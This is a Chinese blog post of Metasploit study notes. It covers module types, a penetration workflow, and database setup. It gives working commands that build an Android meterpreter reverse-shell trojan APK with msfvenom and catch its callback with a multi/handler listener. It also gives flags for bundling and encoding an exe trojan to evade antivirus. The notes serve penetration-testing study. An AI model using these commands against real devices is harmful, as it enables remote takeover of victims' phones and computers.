MSF

最新推荐文章于 2024-08-10 06:01:36 发布
最新推荐文章于 2024-08-10 06:01:36 发布
阅读量4.5k 收藏 5
点赞数 1
分类专栏: kali
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45519736/article/details/109910271
版权

模块:
1、Auxiliaries(辅助模块)

        该模块不会直接在测试者和目标主机之间建立访问,它们只负责执行扫描、嗅探、指纹识别等相关功能以辅助渗透测试。

2、Exploit(漏洞利用模块)

        漏洞利用是指渗透测试者利用一个系统、应用或者服务中的安全漏洞进行的攻击行为。流行的渗透攻击技术包括缓冲区溢出、web应用程序攻击,以及利用配置错误等,其中包含攻击者或测试人员针对系统中的漏洞而设计各种POC验证程序,用于破坏系统安全性的攻击代码,每个漏洞都有相应的攻击代码。

3、Payload(攻击载荷模块)

        攻击载荷是我们期望目标系统在被渗透攻击之后完成实际攻击功能的代码,成功渗透目标后,用于在目标系统上运行任意命令或执行特定代码,在Metasploit框架中可以自由地选择、传送和植入。攻击载荷也可能是简单地在目标操作系统上执行一些命令,如添加用户账号等。

4、Post(后期渗透模块)

        该模块主要用于取得的目标系统远程控制权后,进行的一系列的后渗透攻击动作,如获取敏感信息、实施跳板等。
5、Encoders(编码工具模块)

        该模块在渗透测试中负责免杀,防止被杀毒软件、防火墙、IDS及类似的安全软件检测出来。

MSF渗透攻击流程

  • 扫描目标机系统,寻找可用漏洞。
  • 选择并配置一个漏洞利用模块。
  • 选择并配置一个攻击载荷模块。
  • 选择一个编码技术,用来绕过杀毒软件的查杀。
  • 渗透攻击。

主机扫描
关注点是目标机器I[P地址、可用服务、开放端口等。
使用

service postgresql status			#查看 postgresql 服务状态
service postgresql start			#启动 postgresql 服务

msfdb init                          #初始化数据库

msfconse                            #启动msf

db_status                           #进入msf后输入查看数据库连接状态

简单示例
msf生成apk木马(不免杀)

msfvenom -p android/meterpreter/reverse_tcp LHOST=<your public IP> LPORT=4444 -o shell.apk

-p             指定payload
-o 			   输出      #因为-f列表里没有apk后缀,所以直接输出也可以

把apk安装到手机,然后运行。
之后就是msf上线:

use exploit/multi/handler
set LHOST 0.0.0.0
set LPORT 4444
set PAYLOAD android/meterpreter/reverse_tcp
exploit
#连上木马,可以使用?来查看命令。

msf生成exe木马(不免杀)

-e				指定编码方式对攻击载荷进行重新编码
-x              指定木马捆绑在哪个可执行程序模板上
-i				指定对目标编码的次数,大概多次编码有助于免杀
-f				指定MSF编码器输出的程序格式
-o				指定文件处理完后的输出的路径
full stack cainiao
关注
  • 1
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Metasploit 学习笔记
不急不躁
07-11 2万+
在Kali中使用Metasploit,需要先开启PostgreSQL数据库服务和Metasploit服务 然后就可以完整的利用 msf 数据库查询 exploit 和记录service postgresql start service metasploit start如果不想每次开机都这样,还可以配置随系统启动update-rc.d postgresql enable update-rc.d me
Metasploit学习笔记
weixin_44854561的博客
10-27 325
个人学习——Metasploit学习笔记1 认识metasploit #Meatsploit渗透测试指南学习笔记# 学习目标:认识Metasploit工具 学习内容: 1、 初识渗透测试技术 2、 初始metasploit 3、 学习metasploit基础 1.初识渗透测试 渗透测试(Penetration Testing)是一种通过模拟攻击者的技术与方法,挫败目标系统的安全控制措施并且取得访问控制权的安全测试方式。 PTES将渗透测试过程分为七个阶段: 1.1 前期交互阶段 该阶段通常由渗透测试人
Metasploit学习笔记(一)
qq_42527761的博客
07-31 586
这里写目录标题Metasploit简介Metasploit安装windowslinux里如果有kali的话,会自带Metasploit frameworkMetasploit基础五个模块Auxiliaries(辅助模块)Exploit(漏洞利用模块)Payload(攻击载荷模块)Post(后期渗透模块)Encoders(编码工具模块)渗透测试攻击步骤主机扫描使用辅助模块进行端口扫描使用辅助模块进行服务扫描使用Nmap扫描漏洞利用后渗透攻击-信息收集进程迁移系统命令 Metasploit简介 Metaspl
Metasploit Framework (MSF) 详解
最新发布
cxm4545的博客
08-10 1484
Metasploit Framework (简称MSF)是一款开源的渗透测试框架,它提供了数百个已知软件漏洞的专业级漏洞攻击工具和漏洞利用模块,为渗透测试,shellcode 编写和漏洞研究提供了一个可靠平台。Kali里自带了MSF工具,使用命令 msfconsole 或者 双击MSF图标 即可以启动MSF。本篇就以Kali为实验环境来学习MSF
1、metasploit基础知识(笔记)
purvispanwu的博客
10-30 1004
msf基础知识
msf
weixin_30908707的博客
06-02 385
启动方法 Msfconsole 或者点击桌面的图标 按TAB自动补全 更新 msfupdate 如果你不知道命令怎么用 可以help (你想要了解的命令) 也可以 (你want了解的命令)-h 也是对于命令的解释 利用exploit 两个类型 一种是主动的一种是被动的 返回seesion就可以拿到shell Seeion –L 就你可以看见这个sh...
linux系统安装msf的过程详解
09-14
在Linux系统中安装Metasploit Framework(MSF)是一个重要的步骤,对于网络安全研究者和渗透测试人员来说,这是必备的工具。以下是一个详尽的安装教程,特别针对阿里云Linux系统。 首先,确保你的系统已经更新到...
MSF -基于扩展卡尔曼滤波器 (EKF) 的多传感器融合 模块化框架_C++_代码_相关文件_下载
07-13
标题中的“MSF”指的是“Multi Sensor Fusion”,这是一个用于处理来自多个传感器数据融合的模块化框架。本项目基于扩展卡尔曼滤波器(Extended Kalman Filter, EKF),这是一种广泛应用在估计理论中的算法,用于...
基于MSF的增强版多源传感器融合框架 (VSLAMIMUGNSS).zip
01-24
ETH的MSF是一个非常优秀的多源传感器融合(松耦合)开源框架,尽管是松耦合,但是最终经过修改和调试后的MSF的效果依然让我觉得非常惊喜。同时由于MSF原始代码非常的不优美简洁,所以我特地将MSF源码作为一个“库”...
E004-渗透测试常用工具-使用MSF实现Web传递获取靶机权限.pdf
12-02
本课程重点讲解了如何利用Metasploit(MSF)框架进行渗透测试,通过Web传递的方式获取靶机权限。以下是详细的知识点解析: 1. **Metasploit框架**:Metasploit是一款开源的安全漏洞检测工具,它包含了大量的漏洞...
元器件应用中的MSF系列MSF7907L集成电路实用检测数据
11-20
MSF7907L是一款专门用于提供稳定-7伏特电源的集成电路,它在电子设备中的应用至关重要,特别是对于确保电路中各个组件能够获得精确、稳定的电压输入。这款芯片采用了3脚单列直插式塑料封装,设计紧凑,便于在电路板...
Metasploit 整理笔记
01-10
个人Metasploit 整理笔记,整理了使用Metasploit 的记录,有利于学习Metasploit工具
Metasploit 学习笔记1
u010300900的博客
12-05 213
2.1 MS12-020漏洞利用演示实验 2.1.1 微软关于MS12-020漏洞的安全公告: http://technet.microsoft.com/zh-cn/security/bulletin/ms12-020 2.1.2 实验准备工作 1、该漏洞利用远程桌面的漏洞进行攻击,所以需要靶机xp系统打开远程桌面功能。 2、检查确定渗透测试系统与靶机系统可以互相ping通。 2.1.3 实验步骤...
关于Metasploit的学习笔记(一)
Mi1k7ea
03-08 1169
在百度上关于其的简介:Metasploit是一个免费的、可下载的框架,通过它可以很容易地获取、开发并对计算机软件漏洞实施攻击。它本身附带数百个已知软件漏洞的专业级漏洞攻击工具。当H.D. Moore在2003年发布Metasploit时,计算机安全状况也被永久性地改变了。仿佛一夜之间,任何人都可以成为黑客,每个人都可以使用攻击工具来攻击那些未打过补丁或者刚刚打过补丁的漏洞。软件厂商再也不能推迟发布
什么是MSF
0_net的专栏
10-23 1376
        MSF(微软解决方案框架结构)是一组建立、开发和实现分布式企业系统应用的工作模型、开发准则和应用指南。它帮助企业融合商业和技术的目标,降低采用新技术后系统整体的费用,以及成功的应用微软技术整合商业过程的方法。   MSF揭示出为成功设计、构建和管理技术基础结构或商业解决方案,所需了解的重要风险、重要的设计基础假设和关键的依赖关系。它包括明确的知识库、应用指南和实践经验,如:
关于Metasploit的学习笔记(二)
Mi1k7ea
03-16 1350
这里接着上一遍Metasploit的文章继续~ WMAP Web扫描: 使用WMAP进行Web站点漏洞扫描,其对象是本机所管理的网站。因而在Kali中需要先开启Apache服务。 启动wmap: load wmap 输入help参看模块信息: 接着设置扫描的Web站点,输入wmap_sites -h来查看相应的参数: 按照参数的提示输入命令: w
Metasploit学习笔记(一)——简单使用
Zichel77的博客
10-05 794
在Metasploit中可以使用Nmap进行扫描,用于判断主机的存货状态,也可以扫描主机的操作系统版本,开放的端口和服务状态等。这一步可要可不要,我是做到后面需要nmap扫描的时候需要root权限,所以我第一步就把它打开好了。输入use然后接上模块的名称,对该漏洞利用模块进行利用。这里使用的目标主机是Windows XP,IP地址为。可以看到nmap的版本信息,还有操作符的解释等等。可以看出135,139和445三个端口开放。可以看到搜索出来的模块就是带有该关键字的。此处举例仅介绍目标主机的OS类型。
msf脚本
05-24
MSF(Metasploit Framework)是一个开源的安全漏洞检测和攻击的工具包,它可以帮助安全研究人员和渗透测试人员进行漏洞探测、漏洞利用和后渗透测试等多种操作。MSF中的脚本是一种自动化的攻击工具,可以快速地执行...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值